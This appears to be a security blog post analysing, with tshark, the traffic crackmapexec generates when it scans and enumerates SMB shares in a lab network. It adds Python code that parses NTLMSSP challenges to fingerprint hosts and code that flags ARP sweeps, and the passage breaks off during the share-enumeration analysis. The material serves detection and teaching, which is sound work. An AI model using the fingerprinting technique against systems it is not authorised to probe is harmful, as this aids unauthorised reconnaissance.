Here is the tcpdump filter that was configured to capture the traffic. The "-w" output file will change, as I will have each crackmapexec command in its own pcap.
root@securitynik:~# tcpdump -nnvvi eth0 'not port (9997 or 8089 or 8191 or 8000 or 8065 or 68 or 67)' -w cme-scan.pcap
Now that we have the file named "cme-scan.pcap", let's perform our packet analysis on this.
As always, when running tshark (or wireshark) one of the first things we should do is look at the protocol statistics. We can achieve this as follows:
root@securitynik:~# tshark -n -r cme-scan.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:

eth                                      frames:1570 bytes:72502
  arp                                    frames:1521 bytes:64188
  ip                                     frames:49 bytes:8314
    tcp                                  frames:48 bytes:8244
      nbss                               frames:28 bytes:6940
        smb                              frames:3 bytes:381
        smb2                             frames:25 bytes:6559
    icmp                                 frames:1 bytes:70
===================================================================
Let's look into the TCP traffic by first looking at the conversations.
root@securitynik:~# tshark -n -r cme-scan.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
                                               |       <-      | |       ->      | |     Total     |    Relative    |  Duration  |
                                               | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |            |
10.0.0.100:34564       <-> 10.0.0.105:445           9      1598      10      1166      19      2764    10.223046000        10.5146
10.0.0.100:39670       <-> 10.0.0.3:445             6      1669       8      1030      14      2699     7.135418000         0.0369
10.0.0.100:50874       <-> 10.0.0.103:445           6      1677       8      1030      14      2707     7.174715000         0.0219
10.0.0.100:50838       <-> 10.0.0.2:445             0         0       1        74       1        74     7.135206000         0.0000
================================================================================
Interestingly, crackmapexec returned 3 hosts in its results, but above we see 4 conversations on port 445. Let's set the bottom one aside: it consists of a single 74-byte frame with nothing coming back, while the top 3 each carry over 1000 bytes.
To make this a bit easier on ourselves, let's leverage a tshark filter that only focuses on the first conversation with source port 34564 and destination port 445.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.port == 34564) and (tcp.port == 445)"
388 10.223046 10.0.0.100 → 10.0.0.105 TCP 74 34564 → 445 [SYN] Seq=0 Win=29200 Len=0 MSS=1460 SACK_PERM=1 TSval=2851720854 TSecr=0 WS=128
391 10.223405 10.0.0.105 → 10.0.0.100 TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
392 10.223423 10.0.0.100 → 10.0.0.105 TCP 54 34564 → 445 [ACK] Seq=1 Ack=1 Win=29312 Len=0
395 10.224501 10.0.0.100 → 10.0.0.105 SMB 127 Negotiate Protocol Request
399 10.225553 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
400 10.225566 10.0.0.100 → 10.0.0.105 TCP 54 34564 → 445 [ACK] Seq=74 Ack=253 Win=30336 Len=0
420 10.231080 10.0.0.100 → 10.0.0.105 SMB2 164 Negotiate Protocol Request
421 10.231694 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
444 10.238197 10.0.0.100 → 10.0.0.105 SMB2 212 Session Setup Request, NTLMSSP_NEGOTIATE
446 10.238929 10.0.0.105 → 10.0.0.100 SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
447 10.243642 10.0.0.100 → 10.0.0.105 SMB2 235 Session Setup Request, NTLMSSP_AUTH, User: \
448 10.244629 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
449 10.247201 10.0.0.100 → 10.0.0.105 SMB2 126 Session Logoff Request
450 10.247610 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response
452 10.279539 10.0.0.105 → 10.0.0.100 TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72
453 10.279577 10.0.0.100 → 10.0.0.105 TCP 66 34564 → 445 [ACK] Seq=595 Ack=1017 Win=32512 Len=0 SLE=945 SRE=1017
1565 20.735709 10.0.0.100 → 10.0.0.105 TCP 54 34564 → 445 [FIN, ACK] Seq=595 Ack=1017 Win=32512 Len=0
1566 20.736058 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0
1567 20.737597 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0
With the above we have insight into what the communication looks like. We can see the TCP 3-way handshake being completed, then the SMB session being negotiated and processed, followed by the TCP connection being gracefully terminated.
Now if we look into the Session Setup Response that answers the NTLMSSP_NEGOTIATE (Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE), shown in record number 446, we should be able to gather how crackmapexec was able to determine the operating system, etc. Let's take a look at specific fields in that "Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE" packet to bring some clarity to this. Let's also adjust our tshark filter to look only at traffic coming back from the 3 devices found, while ignoring the ICMP frame. We will revisit the 1521 ARP frames that show up in the protocol hierarchy shortly, but work with me for now.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(tcp.srcport == 445) && !(icmp)"
11 7.135744 10.0.0.3 → 10.0.0.100 TCP 66 445 → 39670 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
14 7.137411 10.0.0.3 → 10.0.0.100 SMB2 506 Negotiate Protocol Response
39 7.145265 10.0.0.3 → 10.0.0.100 SMB2 506 Negotiate Protocol Response
63 7.154134 10.0.0.3 → 10.0.0.100 SMB2 401 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
87 7.163947 10.0.0.3 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED
111 7.172290 10.0.0.3 → 10.0.0.100 TCP 60 445 → 39670 [RST, ACK] Seq=1328 Ack=579 Win=0 Len=0
122 7.174930 10.0.0.103 → 10.0.0.100 TCP 66 445 → 50874 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
125 7.182170 10.0.0.103 → 10.0.0.100 SMB2 506 Negotiate Protocol Response
128 7.185537 10.0.0.103 → 10.0.0.100 SMB2 506 Negotiate Protocol Response
130 7.189042 10.0.0.103 → 10.0.0.100 SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
132 7.194414 10.0.0.103 → 10.0.0.100 SMB2 130 Session Setup Response, Error: STATUS_ACCESS_DENIED
134 7.196617 10.0.0.103 → 10.0.0.100 TCP 60 445 → 50874 [RST, ACK] Seq=1336 Ack=579 Win=0 Len=0
391 10.223405 10.0.0.105 → 10.0.0.100 TCP 66 445 → 34564 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM=1
399 10.225553 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
421 10.231694 10.0.0.105 → 10.0.0.100 SMB2 306 Negotiate Protocol Response
446 10.238929 10.0.0.105 → 10.0.0.100 SMB2 409 Session Setup Response, Error: STATUS_MORE_PROCESSING_REQUIRED, NTLMSSP_CHALLENGE
448 10.244629 10.0.0.105 → 10.0.0.100 SMB2 139 Session Setup Response
450 10.247610 10.0.0.105 → 10.0.0.100 SMB2 126 Session Logoff Response
452 10.279539 10.0.0.105 → 10.0.0.100 TCP 126 [TCP Retransmission] 445 → 34564 [PSH, ACK] Seq=945 Ack=595 Win=2101760 Len=72
1566 20.736058 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [ACK] Seq=1017 Ack=596 Win=2101760 Len=0
1567 20.737597 10.0.0.105 → 10.0.0.100 TCP 60 445 → 34564 [RST, ACK] Seq=1017 Ack=596 Win=0 Len=0
As we can see from above, we have a few response packets from the hosts at 10.0.0.3, 10.0.0.103 and 10.0.0.105. This matches what crackmapexec found so far. Let's now look into the specific fields to show how it learned the information it displayed. Before looking at the specific fields, let's take record number 446 and expand it to see some of the fields.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(frame.number == 446)" -T text -V
Frame 446: 409 bytes on wire (3272 bits), 409 bytes captured (3272 bits)
    Encapsulation type: Ethernet (1)
    Arrival Time: Apr 7, 2019 23:12:40.690090000 EDT
    [Time shift for this packet: 0.000000000 seconds]
    Epoch Time: 1554693160.690090000 seconds
    [Time delta from previous captured frame: 0.000516000 seconds]
    [Time delta from previous displayed frame: 0.000000000 seconds]
    [Time since reference or first frame: 10.238929000 seconds]
    Frame Number: 446
    Frame Length: 409 bytes (3272 bits)
    Capture Length: 409 bytes (3272 bits)
    [Frame is marked: False]
    [Frame is ignored: False]
    [Protocols in frame: eth:ethertype:ip:tcp:nbss:smb2:gss-api:spnego:ntlmssp]
Ethernet II, Src: 08:00:27:d1:1c:e7, Dst: 08:00:27:ac:14:9c
    Destination: 08:00:27:ac:14:9c
        Address: 08:00:27:ac:14:9c
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Source: 08:00:27:d1:1c:e7
        Address: 08:00:27:d1:1c:e7
        .... ..0. .... .... .... .... = LG bit: Globally unique address (factory default)
        .... ...0 .... .... .... .... = IG bit: Individual address (unicast)
    Type: IPv4 (0x0800)
Internet Protocol Version 4, Src: 10.0.0.105, Dst: 10.0.0.100
    0100 .... = Version: 4
    .... 0101 = Header Length: 20 bytes (5)
    Differentiated Services Field: 0x00 (DSCP: CS0, ECN: Not-ECT)
        0000 00.. = Differentiated Services Codepoint: Default (0)
        .... ..00 = Explicit Congestion Notification: Not ECN-Capable Transport (0)
    Total Length: 395
    Identification: 0x515e (20830)
    Flags: 0x4000, Don't fragment
        0... .... .... .... = Reserved bit: Not set
        .1.. .... .... .... = Don't fragment: Set
        ..0. .... .... .... = More fragments: Not set
        ...0 0000 0000 0000 = Fragment offset: 0
    Time to live: 128
    Protocol: TCP (6)
    Header checksum: 0x9342 [validation disabled]
    [Header checksum status: Unverified]
    Source: 10.0.0.105
    Destination: 10.0.0.100
Transmission Control Protocol, Src Port: 445, Dst Port: 34564, Seq: 505, Ack: 342, Len: 355
    Source Port: 445
    Destination Port: 34564
    [Stream index: 3]
    [TCP Segment Len: 355]
    Sequence number: 505    (relative sequence number)
    [Next sequence number: 860    (relative sequence number)]
    Acknowledgment number: 342    (relative ack number)
    0101 .... = Header Length: 20 bytes (5)
    Flags: 0x018 (PSH, ACK)
        000. .... .... = Reserved: Not set
        ...0 .... .... = Nonce: Not set
        .... 0... .... = Congestion Window Reduced (CWR): Not set
        .... .0.. .... = ECN-Echo: Not set
        .... ..0. .... = Urgent: Not set
        .... ...1 .... = Acknowledgment: Set
        .... .... 1... = Push: Set
        .... .... .0.. = Reset: Not set
        .... .... ..0. = Syn: Not set
        .... .... ...0 = Fin: Not set
        [TCP Flags: ·······AP···]
    Window size value: 8211
    [Calculated window size: 2102016]
    [Window size scaling factor: 256]
    Checksum: 0x10ec [unverified]
    [Checksum Status: Unverified]
    Urgent pointer: 0
    [SEQ/ACK analysis]
        [This is an ACK to the segment in frame: 444]
        [The RTT to ACK the segment was: 0.000732000 seconds]
        [iRTT: 0.000377000 seconds]
        [Bytes in flight: 355]
        [Bytes sent since last PSH flag: 355]
    [Timestamps]
        [Time since first frame in this TCP stream: 0.015883000 seconds]
        [Time since previous frame in this TCP stream: 0.000732000 seconds]
    TCP payload (355 bytes)
NetBIOS Session Service
    Message Type: Session message (0x00)
    Length: 351
SMB2 (Server Message Block Protocol version 2)
    SMB2 Header
        Server Component: SMB2
        Header Length: 64
        Credit Charge: 1
        NT Status: STATUS_MORE_PROCESSING_REQUIRED (0xc0000016)
        Command: Session Setup (1)
        Credits granted: 1
        Flags: 0x00000001, Response
            .... .... .... .... .... .... .... ...1 = Response: This is a RESPONSE
            .... .... .... .... .... .... .... ..0. = Async command: This is a SYNC command
            .... .... .... .... .... .... .... .0.. = Chained: This pdu is NOT a chained command
            .... .... .... .... .... .... .... 0... = Signing: This pdu is NOT signed
            .... .... .... .... .... .... .000 .... = Priority: This pdu does NOT contain a PRIORITY1
            ...0 .... .... .... .... .... .... .... = DFS operation: This is a normal operation
            ..0. .... .... .... .... .... .... .... = Replay operation: This is NOT a replay operation
        Chain Offset: 0x00000000
        Message ID: Unknown (2)
        Process Id: 0x00000000
        Tree Id: 0x00000000
        Session Id: 0x000048000000003d
        Signature: 00000000000000000000000000000000
        [Response to: 444]
        [Time from request: 0.000732000 seconds]
    Session Setup Response (0x01)
        StructureSize: 0x0009
            0000 0000 0000 100. = Fixed Part Length: 4
            .... .... .... ...1 = Dynamic Part: True
        Session Flags: 0x0000
            .... .... .... ...0 = Guest: False
            .... .... .... ..0. = Null: False
            .... .... .... .0.. = Encrypt: False
        Blob Offset: 0x00000048
        Blob Length: 279
        Security Blob: a18201133082010fa0030a0101a10c060a2b060104018237...
            GSS-API Generic Security Service Application Program Interface
                Simple Protected Negotiation
                    negTokenTarg
                        negResult: accept-incomplete (1)
                        supportedMech: 1.3.6.1.4.1.311.2.2.10 (NTLMSSP - Microsoft NTLM Security Support Provider)
                        responseToken: 4e544c4d53535000020000001600160038000000358289e2...
                            NTLM Secure Service Provider
                                NTLMSSP identifier: NTLMSSP
                                NTLM Message Type: NTLMSSP_CHALLENGE (0x00000002)
                                Target Name: SECURITYNIK
                                    Length: 22
                                    Maxlen: 22
                                    Offset: 56
                                Negotiate Flags: 0xe2898235, Negotiate 56, Negotiate Key Exchange, Negotiate 128, Negotiate Version, Negotiate Target Info, Negotiate Extended Security, Target Type Domain, Negotiate Always Sign, Negotiate NTLM key, Negotiate Seal, Negotia
                                    1... .... .... .... .... .... .... .... = Negotiate 56: Set
                                    .1.. .... .... .... .... .... .... .... = Negotiate Key Exchange: Set
                                    ..1. .... .... .... .... .... .... .... = Negotiate 128: Set
                                    ...0 .... .... .... .... .... .... .... = Negotiate 0x10000000: Not set
                                    .... 0... .... .... .... .... .... .... = Negotiate 0x08000000: Not set
                                    .... .0.. .... .... .... .... .... .... = Negotiate 0x04000000: Not set
                                    .... ..1. .... .... .... .... .... .... = Negotiate Version: Set
                                    .... ...0 .... .... .... .... .... .... = Negotiate 0x01000000: Not set
                                    .... .... 1... .... .... .... .... .... = Negotiate Target Info: Set
                                    .... .... .0.. .... .... .... .... .... = Request Non-NT Session: Not set
                                    .... .... ..0. .... .... .... .... .... = Negotiate 0x00200000: Not set
                                    .... .... ...0 .... .... .... .... .... = Negotiate Identify: Not set
                                    .... .... .... 1... .... .... .... .... = Negotiate Extended Security: Set
                                    .... .... .... .0.. .... .... .... .... = Target Type Share: Not set
                                    .... .... .... ..0. .... .... .... .... = Target Type Server: Not set
                                    .... .... .... ...1 .... .... .... .... = Target Type Domain: Set
                                    .... .... .... .... 1... .... .... .... = Negotiate Always Sign: Set
                                    .... .... .... .... .0.. .... .... .... = Negotiate 0x00004000: Not set
                                    .... .... .... .... ..0. .... .... .... = Negotiate OEM Workstation Supplied: Not set
                                    .... .... .... .... ...0 .... .... .... = Negotiate OEM Domain Supplied: Not set
                                    .... .... .... .... .... 0... .... .... = Negotiate Anonymous: Not set
                                    .... .... .... .... .... .0.. .... .... = Negotiate NT Only: Not set
                                    .... .... .... .... .... ..1. .... .... = Negotiate NTLM key: Set
                                    .... .... .... .... .... ...0 .... .... = Negotiate 0x00000100: Not set
                                    .... .... .... .... .... .... 0... .... = Negotiate Lan Manager Key: Not set
                                    .... .... .... .... .... .... .0.. .... = Negotiate Datagram: Not set
                                    .... .... .... .... .... .... ..1. .... = Negotiate Seal: Set
                                    .... .... .... .... .... .... ...1 .... = Negotiate Sign: Set
                                    .... .... .... .... .... .... .... 0... = Request 0x00000008: Not set
                                    .... .... .... .... .... .... .... .1.. = Request Target: Set
                                    .... .... .... .... .... .... .... ..0. = Negotiate OEM: Not set
                                    .... .... .... .... .... .... .... ...1 = Negotiate UNICODE: Set
                                NTLM Server Challenge: 67f26f829961c6cf
                                Reserved: 0000000000000000
                                Target Info
                                    Length: 168
                                    Maxlen: 168
                                    Offset: 78
                                    Attribute: NetBIOS domain name: SECURITYNIK
                                        Target Info Item Type: NetBIOS domain name (0x0002)
                                        Target Info Item Length: 22
                                        NetBIOS Domain Name: SECURITYNIK
                                    Attribute: NetBIOS computer name: SECNIK-2K19
                                        Target Info Item Type: NetBIOS computer name (0x0001)
                                        Target Info Item Length: 22
                                        NetBIOS Computer Name: SECNIK-2K19
                                    Attribute: DNS domain name: securitynik.local
                                        Target Info Item Type: DNS domain name (0x0004)
                                        Target Info Item Length: 34
                                        DNS Domain Name: securitynik.local
                                    Attribute: DNS computer name: SECNIK-2K19.securitynik.local
                                        Target Info Item Type: DNS computer name (0x0003)
                                        Target Info Item Length: 58
                                        DNS Computer Name: SECNIK-2K19.securitynik.local
                                    Attribute: Timestamp
                                        Target Info Item Type: Timestamp (0x0007)
                                        Target Info Item Length: 8
                                        Timestamp: Apr 7, 2019 23:12:40.658449900 EDT
                                    Attribute: End of list
                                        Target Info Item Type: End of list (0x0000)
                                        Target Info Item Length: 0
                                Version 10.0 (Build 17763); NTLM Current Revision 15
                                    Major Version: 10
                                    Minor Version: 0
                                    Build Number: 17763
                                    NTLM Current Revision: 15
From above, we have broken out every field in this packet. As you can see, a lot of the information crackmapexec reported is already visible here. Let's now wrap this part up by extracting those fields and presenting them in a more user-friendly manner.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(ntlmssp.messagetype == 0x00000002)" -T fields -e ip.src -e tcp.srcport -e ip.dst -e tcp.dstport -e ntlmssp.identifier -e ntlmssp.challenge.target_name -e ntlmssp.challenge.target_info.nb_domain_name -e ntlmssp.version.major -e ntlmssp.version.build_number -E header=y
ip.src	tcp.srcport	ip.dst	tcp.dstport	ntlmssp.identifier	ntlmssp.challenge.target_name	ntlmssp.challenge.target_info.nb_domain_name	ntlmssp.version.major	ntlmssp.version.build_number
10.0.0.3	445	10.0.0.100	39670	NTLMSSP	SECURITYNIK-SYS	SECURITYNIK-SYS	10	17763
10.0.0.103	445	10.0.0.100	50874	NTLMSSP	SECURITYNIK-WIN	SECURITYNIK-WIN	10	16299
10.0.0.105	445	10.0.0.100	34564	NTLMSSP	SECURITYNIK	SECURITYNIK	10	17763
Obviously, you should now try to extract some of the other fields that I did not include.
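To see why all of this is available to anyone who merely starts an SMB session, here is an added example (my own code, not from this post or from crackmapexec) that parses an NTLMSSP CHALLENGE message, the bytes tshark labels responseToken in the dissection above, straight from the wire format in MS-NLMP. The sample message is constructed here from the values shown for frame 446 (target name, flags, server challenge, TargetInfo list, version); it is not the captured bytes, though its first 24 bytes match the responseToken prefix tshark printed.

```python
"""Parse an NTLMSSP CHALLENGE (Type 2) message and pull out what the server
volunteers about itself before any credential has been accepted.

Layout per MS-NLMP 2.2.1.2. The sample message is constructed from the values
tshark displayed for frame 446; it is not captured data."""
import struct
from datetime import datetime, timedelta, timezone

NEGOTIATE_UNICODE = 0x00000001       # strings are UTF-16LE
NEGOTIATE_TARGET_INFO = 0x00800000   # AV_PAIR list is present
NEGOTIATE_VERSION = 0x02000000       # 8-byte Version field is present

AV_NAMES = {1: "nb_computer_name", 2: "nb_domain_name", 3: "dns_computer_name",
            4: "dns_domain_name", 5: "dns_tree_name", 6: "flags", 7: "timestamp"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
UNIX_EPOCH_AS_FILETIME = 116444736000000000  # 100 ns ticks from 1601 to 1970


def filetime_to_datetime(ticks):
    """Windows FILETIME (100 ns units since 1601-01-01 UTC) -> aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def parse_av_pairs(blob):
    """Walk the TargetInfo AV_PAIR list until AvId 0 (end of list)."""
    pairs, off = {}, 0
    while off + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, off)
        off += 4
        if av_id == 0:
            break
        value = blob[off:off + av_len]
        off += av_len
        name = AV_NAMES.get(av_id, f"av_0x{av_id:04x}")
        if av_id in (1, 2, 3, 4, 5):
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 7:
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:
            pairs[name] = value
    return pairs


def parse_challenge(msg):
    """Return target name, flags, server challenge, version and TargetInfo."""
    if msg[:8] != b"NTLMSSP\x00":
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", msg, 8)[0]
    if msg_type != 2:
        raise ValueError(f"expected CHALLENGE (type 2), got type {msg_type}")
    tn_len, _tn_max, tn_off = struct.unpack_from("<HHI", msg, 12)
    flags = struct.unpack_from("<I", msg, 20)[0]
    ti_len, _ti_max, ti_off = struct.unpack_from("<HHI", msg, 40)
    encoding = "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"
    out = {
        "flags": flags,
        "server_challenge": msg[24:32].hex(),
        "target_name": msg[tn_off:tn_off + tn_len].decode(encoding),
    }
    if flags & NEGOTIATE_VERSION:   # Major, Minor, Build, 3 reserved bytes, NTLMRevision
        out["version"] = struct.unpack_from("<BBH3xB", msg, 48)
    if flags & NEGOTIATE_TARGET_INFO:
        out["target_info"] = parse_av_pairs(msg[ti_off:ti_off + ti_len])
    return out


def build_sample_challenge():
    """Constructed Type 2 message mirroring the values tshark showed for frame 446."""
    def av(av_id, value):
        return struct.pack("<HH", av_id, len(value)) + value

    def u16(text):
        return text.encode("utf-16-le")

    # 23:12:40.6584499 EDT on 2019-04-07 is 1554693160.6584499 seconds of Unix time
    filetime = 1554693160 * 10**7 + 6584499 + UNIX_EPOCH_AS_FILETIME
    target_info = (av(2, u16("SECURITYNIK")) + av(1, u16("SECNIK-2K19"))
                   + av(4, u16("securitynik.local"))
                   + av(3, u16("SECNIK-2K19.securitynik.local"))
                   + av(7, struct.pack("<Q", filetime)) + av(0, b""))
    target_name = u16("SECURITYNIK")
    header = (b"NTLMSSP\x00" + struct.pack("<I", 2)
              + struct.pack("<HHI", len(target_name), len(target_name), 56)
              + struct.pack("<I", 0xE2898235)                     # flags from the dissection
              + bytes.fromhex("67f26f829961c6cf") + bytes(8)      # challenge + reserved
              + struct.pack("<HHI", len(target_info), len(target_info), 56 + len(target_name))
              + struct.pack("<BBH3xB", 10, 0, 17763, 15))         # Version 10.0 build 17763
    return header + target_name + target_info


def fingerprint(msg):
    """One-line summary in the spirit of the tshark -T fields output above."""
    c = parse_challenge(msg)
    ti = c.get("target_info", {})
    major, minor, build, _rev = c.get("version", (0, 0, 0, 0))
    return (f"{c['target_name']} {ti.get('nb_computer_name', '?')} "
            f"{ti.get('dns_computer_name', '?')} Windows {major}.{minor} build {build}")


if __name__ == "__main__":
    print(fingerprint(build_sample_challenge()))
```

To run it against a real capture, copy the full responseToken hex from the tshark -V output and pass bytes.fromhex(...) to parse_challenge(). The server fills in the host name, domain, DNS names, build number and its clock in the challenge itself, which is why a scanner learns all of this without ever presenting a valid credential.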
Before we go, recall that when we looked at the protocol hierarchy above there were ARP packets. Let's see what we can gather from these.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" | wc --lines
1521
From above, it looks like we have 1521 ARP messages. Let's see what is really going on here. To help us understand, let's once again look into the fields and parse out the information of interest.
root@securitynik:~# tshark -n -r cme-scan.pcap -Y "(arp)" -T fields -e arp.src.hw_mac -e arp.src.proto_ipv4 -e arp.dst.proto_ipv4 -e arp.opcode -E header=y | more
arp.src.hw_mac	arp.src.proto_ipv4	arp.dst.proto_ipv4	arp.opcode
08:00:27:ec:69:d7	10.0.0.103	10.0.0.102	1
08:00:27:ec:69:d7	10.0.0.103	10.0.0.102	1
08:00:27:ec:69:d7	10.0.0.103	10.0.0.102	1
08:00:27:ec:69:d7	10.0.0.103	10.0.0.102	1
08:00:27:ec:69:d7	10.0.0.103	10.0.0.102	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.1	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.4	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.5	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.6	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.7	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.8	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.9	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.10	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.49	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.50	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.51	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.52	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.53	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.54	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.55	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.56	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.57	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.58	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.59	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.11	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.12	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.13	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.14	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.15	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.16	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.17	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.18	1
08:00:27:ac:14:9c	10.0.0.100	10.0.0.21	1
.... <truncated for brevity> ....
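The ARP output above is the signature of a subnet sweep: one (MAC, IP) pair asking for address after address, most of which never answer. As an added example (my own code, not from this post), here is a small detector that reads exactly the tab-separated tshark -T fields output shown above and scores each requester by distinct targets and unanswered requests. The sample rows are constructed to mirror the listing; the reply rows and the MAC given for 10.0.0.3 are made up, since the post does not show them.

```python
"""Flag ARP sweeps in the output of
  tshark -T fields -e arp.src.hw_mac -e arp.src.proto_ipv4 -e arp.dst.proto_ipv4 -e arp.opcode -E header=y

A sweep shows as one (MAC, IP) pair asking for many distinct addresses, most of
which never reply. The sample is constructed to mirror the listing above; the
reply rows and the MAC for 10.0.0.3 are placeholders."""
from collections import defaultdict

ARP_REQUEST, ARP_REPLY = 1, 2
SWEEP_THRESHOLD = 16   # distinct targets per requester before we call it a sweep


def build_sample():
    """Constructed tshark field output, tab separated, header line first."""
    rows = ["arp.src.hw_mac\tarp.src.proto_ipv4\tarp.dst.proto_ipv4\tarp.opcode"]
    # one host repeatedly asking for a single neighbour: noisy, but not a sweep
    rows += ["08:00:27:ec:69:d7\t10.0.0.103\t10.0.0.102\t1"] * 5
    # the scanner walking the subnet in the same out-of-order chunks seen above
    for last in [*range(1, 11), *range(49, 60), *range(11, 22), 103, 105]:
        rows.append(f"08:00:27:ac:14:9c\t10.0.0.100\t10.0.0.{last}\t1")
    # the only three hosts that answer (constructed replies)
    rows.append("08:00:27:00:00:03\t10.0.0.3\t10.0.0.100\t2")      # placeholder MAC
    rows.append("08:00:27:ec:69:d7\t10.0.0.103\t10.0.0.100\t2")
    rows.append("08:00:27:d1:1c:e7\t10.0.0.105\t10.0.0.100\t2")
    return "\n".join(rows) + "\n"


def parse_arp_fields(text):
    """Rows of (mac, sender_ip, target_ip, opcode); the first line is the header."""
    rows = []
    for line in text.splitlines()[1:]:
        if not line.strip():
            continue
        mac, sender, target, opcode = line.split("\t")
        rows.append((mac, sender, target, int(opcode)))
    return rows


def arp_sweep_report(rows, threshold=SWEEP_THRESHOLD):
    """Per requesting (mac, ip): distinct targets asked for, and how many never replied."""
    asked = defaultdict(set)
    responders = {sender for _, sender, _, op in rows if op == ARP_REPLY}
    for mac, sender, target, op in rows:
        if op == ARP_REQUEST:
            asked[(mac, sender)].add(target)
    report = {}
    for prober, targets in asked.items():
        report[prober] = {
            "distinct_targets": len(targets),
            "unanswered": len(targets - responders),
            "sweep": len(targets) >= threshold,
        }
    return report


if __name__ == "__main__":
    for (mac, ip), r in arp_sweep_report(parse_arp_fields(build_sample())).items():
        print(f"{ip} ({mac}): {r}")
```

The unanswered count is the useful second signal: a DHCP server or a monitoring box may legitimately ARP for many hosts, but it rarely asks for dozens of addresses that do not exist.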
Let's now look at what the packets look like as CrackMapExec enumerates the shares.
Let's once again start by looking at the protocol hierarchy.
root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z io,phs -q
===================================================================
Protocol Hierarchy Statistics
Filter:

eth                                      frames:487 bytes:131203
  arp                                    frames:5 bytes:300
  ip                                     frames:482 bytes:130903
    tcp                                  frames:482 bytes:130903
      nbss                               frames:394 bytes:115138
        smb                              frames:8 bytes:1016
        smb2                             frames:386 bytes:114122
      tcp.segments                       frames:2 bytes:2764
===================================================================
From above we see both SMB and SMB2 conversations. I take that to mean that the conversation probably started on SMB1 and then negotiated up to SMB2.
Let's look into the conversations.
root@securitynik:~/cme# tshark -n -r cme-enum-shares.pcap -z conv,tcp -q
================================================================================
TCP Conversations
Filter:<No Filter>
                                               |       <-      | |       ->      | |     Total     |    Relative    |  Duration  |
                                               | Frames  Bytes | | Frames  Bytes | | Frames  Bytes |      Start     |            |
10.0.0.100:35710       <-> 10.0.0.105:445          88     32754      95     19205     183     51959     4.701908000         1.3409
10.0.0.100:52026       <-> 10.0.0.103:445          77     32785      88     19170     165     51955     4.702229000         1.3245
10.0.0.100:41024       <-> 10.0.0.3:445            13      3322      17      3681      30      7003     4.778967000         1.2455
10.0.0.100:35716       <-> 10.0.0.105:445          14      2952      15      2945      29      5897     4.797176000         1.2259
10.0.0.100:52032       <-> 10.0.0.103:445          13      3074      15      2883      28      5957     5.162347000         0.8619
